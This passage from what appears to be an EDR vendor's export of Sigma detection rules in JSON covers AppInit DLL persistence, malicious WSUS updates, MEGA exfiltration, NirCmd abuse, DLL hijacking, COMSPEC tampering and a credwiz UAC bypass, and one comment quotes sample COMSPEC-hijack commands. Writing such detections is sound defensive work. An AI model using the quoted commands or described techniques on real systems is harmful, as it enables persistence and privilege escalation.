'?:\\PROGRA~?\\Sophos\\SOPHOS~?\\SOPHOS~?.DLL'\n - '?:\\PROGRA~?\\Citrix\\System32\\mfaphook64.dll,?:\\Windows\\system32\\SophosAV\\SOPHOS~?.DLL'\n - '?:\\PROGRA~?\\Citrix\\System32\\mfaphook.dll,?:\\Windows\\SysWOW64\\SophosAV\\SOPHOS~?.DLL'\n - '?:\\Windows\\System32\\SophosAV\\sophos_detoured_x64.dll'\n - '?:\\PROGRA~?\\Sophos\\SOPHOS~?\\SOPHOS~?.DLL,?:\\PROGRA~?\\Sophos\\SOPHOS~?\\\\?SOPHOS~?.DLL'\n - '?:\\PROGRA~?\\Sophos\\SOPHOS~?\\\\?SOPHOS~?.DLL'\n\n exclusion_sophos_loadappinit:\n TargetObject|endswith: '\\LoadAppInit_DLLs'\n Image:\n - '?:\\ProgramData\\Sophos\\AutoUpdate\\Cache\\sophos_autoupdate?.dir\\ALUpdate.exe'\n - '?:\\ProgramData\\Sophos\\AutoUpdate\\Cache\\sophos_autoupdate?.dir\\su-setup32.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Sophos Limited'\n - 'Sophos Ltd'\n\n exclusion_appsense:\n TargetObject|endswith: '\\AppInit_DLLs'\n 
Image: '?:\\Program Files\\AppSense\\Environment Manager\\Agent\\EmCoreService.exe'\n\n # Equitrac Office Client\n exclusion_equitrac:\n TargetObject|endswith: '\\AppInit_DLLs'\n Image: '?:\\Windows\\System32\\msiexec.exe'\n Details: 'EQPortMonitorSpy.dll'\n\n exclusion_msi_install_loadappinit:\n TargetObject|endswith: '\\LoadAppInit_DLLs'\n Details: 'DWORD (0x00000001)'\n ProcessCommandLine:\n - '?:\\Windows\\syswow64\\MsiExec.exe -Embedding * E Global\\MSI0000'\n - '?:\\Windows\\system32\\MsiExec.exe -Embedding * E Global\\MSI0000'\n ProcessParentCommandLine: '?:\\WINDOWS\\system32\\msiexec.exe /V'\n\n exclusion_nvidia_hp:\n TargetObject|endswith: '\\AppInit_DLLs'\n ProcessImage|contains: '\\Display.NvContainer\\NVDisplay.Container.exe'\n Details:\n - '?:\\PROGRA~?\\HP\\SURECL~?\\servers\\BemHook32.dll'\n - '?:\\PROGRA~?\\HP\\SURECL~?\\servers\\BemHook.dll'\n\n exclusion_citrix:\n TargetObject|endswith: '\\AppInit_DLLs'\n Details:\n - '?:\\PROGRA~?\\Citrix\\System32\\mfaphook64.dll'\n - '?:\\PROGRA~?\\Citrix\\System32\\mfaphook.dll'\n - '?:\\progra~?\\citrix\\system32\\radeaphook.dll'\n - '?:\\progra~?\\citrix\\system32\\radeaphook64.dll'\n\n exclusion_setupplatform:\n TargetObject|endswith: '\\AppInit_DLLs'\n ProcessImage: '?:\\$WINDOWS.~BT\\Sources\\setupplatform.exe'\n\n exclusion_greenprint:\n # ce0cd8e9ad34b85bd164a60a4a5de5cee895353d8520cf14923399d1001aa3e1\n Details: '?:\\Progra~?\\Greenp~?\\gphknt32.dll'\n\n exclusion_altiris:\n - ProcessImage: '?:\\Program Files\\Altiris\\Altiris Agent\\AeXNSAgent.exe'\n TargetObject:\n - 'HKLM\\software\\microsoft\\windows nt\\currentversion\\windows\\loadappinit_dlls'\n - 'HKLM\\software\\wow6432node\\microsoft\\windows nt\\currentversion\\windows\\loadappinit_dlls'\n Details: 'DWORD (0x00000001)'\n - ProcessImage: '?:\\Program Files\\Altiris\\Altiris Agent\\AeXNSAgent.exe'\n TargetObject:\n - 'HKLM\\software\\microsoft\\windows nt\\currentversion\\windows\\appinit_dlls'\n - 
'HKLM\\software\\wow6432node\\microsoft\\windows nt\\currentversion\\windows\\appinit_dlls'\n Details:\n - 'aminit64.dll'\n - 'aminit32.dll'\n\n exclusion_virtualdesktop:\n ProcessImage: '?:\\Windows\\System32\\msiexec.exe'\n Details: '?:\\PROGRA~?\\VIRTUA~?\\VIRTUA~?.DLL'\n\n exclusion_systrack:\n ProcessImage: '?:\\Program Files (x86)\\SysTrack\\LsiAgent\\LsiAgent.exe'\n\n condition: selection_registry and ((selection_loadappinit and not filter_loadappinit) or 1 of selection_key_*) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1dff2e4d-9edd-4b48-af83-6c559ea3e9c5", + "rule_name": "Registry AppInit DLLs Modified", + "rule_description": "Detects the modification of the AppInit_DLLs or LoadAppInit_DLLs keys in registry.\nAttackers may establish persistence by loading malicious libraries (DLL) via AppInit DLLs.\nThis functionality allows custom libraries (DLL) to be loaded into the address space of every process that loads user32.dll.\nIt is recommended to analyze the process responsible for the registry and the library pointed to by the registry value to look for malicious content or actions.\n", + "rule_creation_date": "2020-09-24", + "rule_modified_date": "2025-05-19", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.persistence" + ], + "rule_technique_tags": [ + "attack.t1112", + "attack.t1546.010" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1e085ad6-7f93-463c-9238-b75582736135", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + 
"whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.072911Z", + "creation_date": "2026-03-23T11:45:34.072913Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.072918Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/nettitude/SharpWSUS", + "https://github.com/ThunderGunExpress/Thunder_Woosus", + "https://github.com/AlsidOfficial/WSUSpendu", + "https://attack.mitre.org/techniques/T1210/" + ], + "name": "t1210_potential_malicious_update_through_wsus.yml", + "content": "title: Possible Malicious Update via WSUS\nid: 1e085ad6-7f93-463c-9238-b75582736135\ndescription: |\n Detects the installation of updates with an unusual name or associated with malicious tools exploiting WSUS (Windows Server Update Services).\n Attackers can use WSUS to launch malicious payloads disguised as Windows Updates.\n This technique can be used for lateral movement.\n It is recommended to analyze the content of the update package, to investigate the source of the update and to look for signs of malicious actions on the IT's WSUS server.\nreferences:\n - https://github.com/nettitude/SharpWSUS\n - https://github.com/ThunderGunExpress/Thunder_Woosus\n - https://github.com/AlsidOfficial/WSUSpendu\n - https://attack.mitre.org/techniques/T1210/\ndate: 2022/11/16\nmodified: 2025/03/07\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1210\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.Exploitation\n - 
classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n service: system\ndetection:\n selection:\n EventID: 19 # Successful update\n Source: Microsoft-Windows-WindowsUpdateClient\n updateTitle|contains:\n - 'SharpWSUS'\n - 'Probably-legal-update'\n - 'Bundle update for \\* Windows (from KB2862335)'\n - 'Bundle Security Update for \\* Windows (from KB2862335)'\n\n condition: selection\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1e085ad6-7f93-463c-9238-b75582736135", + "rule_name": "Possible Malicious Update via WSUS", + "rule_description": "Detects the installation of updates with an unusual name or associated with malicious tools exploiting WSUS (Windows Server Update Services).\nAttackers can use WSUS to launch malicious payloads disguised as Windows Updates.\nThis technique can be used for lateral movement.\nIt is recommended to analyze the content of the update package, to investigate the source of the update and to look for signs of malicious actions on the IT's WSUS server.\n", + "rule_creation_date": "2022-11-16", + "rule_modified_date": "2025-03-07", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.lateral_movement" + ], + "rule_technique_tags": [ + "attack.t1210" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1eb11fe6-9630-4058-bdec-67f5cde7cb1a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": 
false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.091788Z", + "creation_date": "2026-03-23T11:45:34.091790Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.091794Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/", + "https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/", + "https://attack.mitre.org/techniques/T1071/001/" + ], + "name": "t1567_002_suspicious_url_request_to_mega.yml", + "content": "title: Suspicious URL Request to the MEGA API\nid: 1eb11fe6-9630-4058-bdec-67f5cde7cb1a\ndescription: |\n Detects suspicious URL requests to the file sharing service MEGA.\n Adversaries can use legitimate sharing services to exfiltrate data or to download malicious files.\n The BlackByte ransomware is known to use the MEGA API to exfiltrate data via a specific tool named ExByte.\n It is recommended to investigate the source of these URL requests and analyze the process responsible for accessing MEGA.\n Additionally, review alerts and try to analyze the downloaded file.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/\n - https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2023/07/17\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1102.002\n - attack.exfiltration\n - attack.t1567.002\n - attack.t1537\n - 
classification.Windows.Source.UrlRequest\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.FileDownload\nlogsource:\n product: windows\n category: url_request\ndetection:\n selection:\n RequestUrlHost: 'g.api.mega.co.nz'\n\n filter_mega:\n ProcessSigned: 'true'\n ProcessSignature: 'Mega Limited'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1eb11fe6-9630-4058-bdec-67f5cde7cb1a", + "rule_name": "Suspicious URL Request to the MEGA API", + "rule_description": "Detects suspicious URL requests to the file sharing service MEGA.\nAdversaries can use legitimate sharing services to exfiltrate data or to download malicious files.\nThe BlackByte ransomware is known to use the MEGA API to exfiltrate data via a specific tool named ExByte.\nIt is recommended to investigate the source of these URL requests and analyze the process responsible for accessing MEGA.\nAdditionally, review alerts and try to analyze the downloaded file.\n", + "rule_creation_date": "2023-07-17", + "rule_modified_date": "2025-02-04", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.command_and_control", + "attack.exfiltration" + ], + "rule_technique_tags": [ + "attack.t1102.002", + "attack.t1537", + "attack.t1567.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1ecc91f4-bed7-4cec-b236-f7b943f95289", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:35.295810Z", + "creation_date": "2026-03-23T11:45:35.295814Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:35.295820Z", + "rule_level": "medium", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://twitter.com/1ZRR4H/status/1575364101148114944", + "https://www.nirsoft.net/utils/nircmd.html", + "https://attack.mitre.org/techniques/T1059/" + ], + "name": "t1059_execution_of_nircmd.yml", + "content": "title: NirCmd Execution\nid: 1ecc91f4-bed7-4cec-b236-f7b943f95289\ndescription: |\n Detects the execution of the NirCmd.\n NirCmd is a command-line utility allowing users to perform useful tasks, such as updating registry keys, executing commands, updating network configuration, editing files, etc.\n It can also be used by attackers to execute commands while evading defenses.\n It is recommended to investigate the actions that were performed by NirCmd as well as NirCmd's execution context to determine its legitimacy.\nreferences:\n - https://twitter.com/1ZRR4H/status/1575364101148114944\n - https://www.nirsoft.net/utils/nircmd.html\n - https://attack.mitre.org/techniques/T1059/\ndate: 2022/11/03\nmodified: 2026/02/16\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.NirCmd\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_binary:\n - OriginalFileName: 'nircmd.exe'\n - 
Image|endswith: '\\nircmd.exe'\n\n selection_path:\n - Image:\n - '?:\\nircmd.exe'\n # AtomicRedTeam\n - '*\\ExternalPayloads\\nircmd.exe'\n - Image|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\'\n - '?:\\\\?Recycle.Bin\\'\n\n # This is handled in the rule ad9a4851-d601-4528-a0d2-a3d77b050741\n filter_suspicious_commandline:\n CommandLine|contains:\n - ' elevatecmd '\n - ' execmd '\n - ' exec '\n - ' exec2 '\n - ' runassystem '\n - ' service '\n - ' savescreenshot '\n - ' savescreenshotfull '\n\n exclusion_commandline:\n CommandLine: '*\\nircmd.exe setsysvolume *'\n\n exclusion_mpladmin:\n ParentImage|endswith: '\\MPLAdmin.exe'\n\n # https://www.dicomizer.com/\n exclusion_modalizer:\n - CommandLine:\n - 'nircmd win close ititle OBS'\n - 'nircmd win close ititle capture'\n # nircmd convertimages c:\\videocapture\\capture\\*.png .jpg\n - 'nircmd convertimages ?:\\videocapture\\capture\\\\*'\n # nircmd win setsize title capture 980 90 390 650\n - 'nircmd win setsize title capture *'\n - ParentCommandLine: '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\videocapture\\\\*\\\\*.bat'\n\n exclusion_westerndigital:\n ParentImage: '?:\\Program Files (x86)\\Western Digital\\Discovery\\Current\\WD Discovery.exe'\n\n exclusion_medinbox:\n ParentCommandLine: '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\\\*\\Medinbox\\Medinbox.Launcher\\Medinbox.Launcher.bat'\n\n exclusion_openwhispr:\n Image|endswith: '\\resources\\bin\\nircmd.exe'\n ProcessParentProduct: 'OpenWhispr'\n ProcessParentCompany: 'OpenWhispr Team'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1ecc91f4-bed7-4cec-b236-f7b943f95289", + "rule_name": "NirCmd Execution", + "rule_description": "Detects the execution of the NirCmd.\nNirCmd is a command-line utility allowing users to perform useful 
tasks, such as updating registry keys, executing commands, updating network configuration, editing files, etc.\nIt can also be used by attackers to execute commands while evading defenses.\nIt is recommended to investigate the actions that were performed by NirCmd as well as NirCmd's execution context to determine its legitimacy.\n", + "rule_creation_date": "2022-11-03", + "rule_modified_date": "2026-02-16", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.execution" + ], + "rule_technique_tags": [ + "attack.t1059", + "attack.t1218" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1ee1a6bd-bf16-4c3b-b9a0-65061ba1dbdc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.602126Z", + "creation_date": "2026-03-23T11:45:34.602129Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.602137Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://github.com/xforcered/WFH", + 
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_setupugc.yml", + "content": "title: DLL Hijacking via setupugc.exe\nid: 1ee1a6bd-bf16-4c3b-b9a0-65061ba1dbdc\ndescription: |\n Detects potential Windows DLL Hijacking via setupugc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'setupugc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbgcore.DLL'\n - '\\dbghelp.dll'\n - '\\DNSAPI.dll'\n - '\\mpr.dll'\n - '\\WDSCORE.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n 
Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1ee1a6bd-bf16-4c3b-b9a0-65061ba1dbdc", + "rule_name": "DLL Hijacking via setupugc.exe", + "rule_description": "Detects potential Windows DLL Hijacking via setupugc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1f00e764-5dc8-4df8-a8d7-2e11b24a7e76", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + 
"rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.080239Z", + "creation_date": "2026-03-23T11:45:34.080241Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.080245Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/guardicore/monkey/blob/59e7ac34f70536e104d848a1610f07aacf2f012e/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py", + "https://attack.mitre.org/techniques/T1216/" + ], + "name": "t1216_cmd_comspec_tampering.yml", + "content": "title: COMSPEC Tampered via cmd.exe\nid: 1f00e764-5dc8-4df8-a8d7-2e11b24a7e76\ndescription: |\n Detects a tampering of the COMSPEC environment variable in cmd.exe command-line.\n This can be used to perform a signed script proxy execution and takeover control of a legitimate script.\n It is recommended to investigate the binary pointed to by the path in the COMSPEC variable and other actions taken by the parent process to determine whether this action was legitimate.\nreferences:\n - https://github.com/guardicore/monkey/blob/59e7ac34f70536e104d848a1610f07aacf2f012e/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py\n - https://attack.mitre.org/techniques/T1216/\ndate: 2022/01/21\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1216\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # C:\\Windows\\system32\\cmd.exe /c set comspec=C:\\Windows\\system32\\T1216_random_executable.exe && cscript C:\\Windows\\System32\\manage-bde.wsf\n # C:\\Windows\\system32\\cmd.exe /c set comspec=C:\\Windows\\system32\\cmd.exe\n # 
$env:comspec=C:\\Windows\\system32\\calc.exe; cscript C:\\Windows\\System32\\manage-bde.wsf\n selection_1:\n - Image|endswith: '\\cmd.exe'\n # Renamed binaries\n - OriginalFileName: 'Cmd.EXE'\n selection_2:\n CommandLine|contains|all:\n - '/c '\n - 'set'\n - ' comspec='\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1f00e764-5dc8-4df8-a8d7-2e11b24a7e76", + "rule_name": "COMSPEC Tampered via cmd.exe", + "rule_description": "Detects a tampering of the COMSPEC environment variable in cmd.exe command-line.\nThis can be used to perform a signed script proxy execution and takeover control of a legitimate script.\nIt is recommended to investigate the binary pointed to by the path in the COMSPEC variable and other actions taken by the parent process to determine whether this action was legitimate.\n", + "rule_creation_date": "2022-01-21", + "rule_modified_date": "2025-01-28", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1216" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1f520703-a22a-4e93-8e0f-30cd3c1272f1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + 
"rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.074233Z", + "creation_date": "2026-03-23T11:45:34.074235Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.074239Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/hfiref0x/UACME" + ], + "name": "t1548_002_uac_bypass_credwiz.yml", + "content": "title: UAC Bypass Executed via credwiz\nid: 1f520703-a22a-4e93-8e0f-30cd3c1272f1\ndescription: |\n Detects an UAC bypass via credwiz.exe.\n This alert triggers on credwiz.exe or oobe.exe loading a netutils.dll which is not signed by Microsoft.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible to look for malicious content or actions.\nreferences:\n - https://github.com/hfiref0x/UACME\ndate: 2021/01/06\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.001\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.DLLHijacking\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection_standard_hijack:\n Image: '?:\\Windows\\System32\\credwiz.exe'\n ImageLoaded|endswith: '\\netutils.dll'\n\n selection_renamed_hijack:\n Image: '?:\\Windows\\System32\\wbem\\oobe.exe'\n ImageLoaded|endswith: '\\netutils.dll'\n\n filter_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 
'Microsoft Corporation'\n\n condition: 1 of selection_* and not 1 of filter_*\nlevel: high\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1f520703-a22a-4e93-8e0f-30cd3c1272f1", + "rule_name": "UAC Bypass Executed via credwiz", + "rule_description": "Detects an UAC bypass via credwiz.exe.\nThis alert triggers on credwiz.exe or oobe.exe loading a netutils.dll which is not signed by Microsoft.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible to look for malicious content or actions.\n", + "rule_creation_date": "2021-01-06", + "rule_modified_date": "2025-02-19", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1548.002", + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1f5a2648-0258-4ffe-93b8-f4aa01a21d2c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + 
